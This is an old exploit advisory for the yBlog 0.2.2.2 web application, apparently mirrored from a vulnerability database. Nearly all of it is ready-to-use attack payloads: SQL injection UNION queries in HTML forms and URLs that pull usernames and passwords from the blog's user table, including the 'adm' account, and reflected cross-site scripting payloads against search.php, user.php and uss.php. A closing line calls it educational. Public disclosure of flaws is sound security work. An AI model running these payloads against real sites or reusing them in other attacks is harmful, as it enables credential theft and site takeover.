Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19999
HistoryJun 10, 2008 - 12:00 a.m.

[web-app] yBlog 0.2.2.2 Multiple Remote Vulnerabilities

2008-06-1000:00:00
vulners.com
25

/ | || | _ \| _ | _ | |
| (
| _ | [)/| () | () | | |
\_____|
| ||| ||||| ||
C. H. R. O. O. T. SECURITY GROUP
- – ----- — – – ---- — – -
http://www.chroot.org

                      _   _ _ _____ ____ ____ __  _ 
    Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
    Conference 2008  |  _  | | | | | (__| () |     |
                     |_| |_|_| |_| \____|____|_|\__|
                                  http://www.hitcon.org

Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: yBlog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz

Mirror ======:: http://www.badongo.com/file/9705849


[SQL Injection]

  • {search.php} -

<form action="http://localhost/yblog/search.php&quot; method="post">
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
<input type="submit" value="send">
</form>

<form action="http://localhost/yblog/search.php&quot; method="post">
<input type="hidden" name="cn" value="1">
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
<input type="submit" value="send">
</form>

  • {user.php} -

http://localhost/yblog/user.php?n=-99&#39;+union+select+0,1,2,3,usuario,password,6,7,8,9,10,11,12,13,14,15,16+from+usuarios/*

  • {uss.php} -

http://localhost/yblog/uss.php?action=2&amp;done=1&amp;n=-99&#39;+union+select+0,1,2,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usuario=&#39;adm&#39;/*


[Cross-Site Scripting]

  • {search.php} -

<form action="http://localhost/yblog/search.php&quot; method="post">
<input type="hidden" name="q" value="<script>alert(/xss/)</script>">
<input type="submit" value="send">
</form>

  • {user.php} -

http://localhost/yblog/user.php?n=&lt;script&gt;alert&#40;/xss/&#41;&lt;/script&gt;

  • {uss.php} -

http://localhost/yblog/uss.php?action=2&amp;done=1&amp;n=&lt;script&gt;alert&#40;/xss/&#41;&lt;/script&gt;


[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!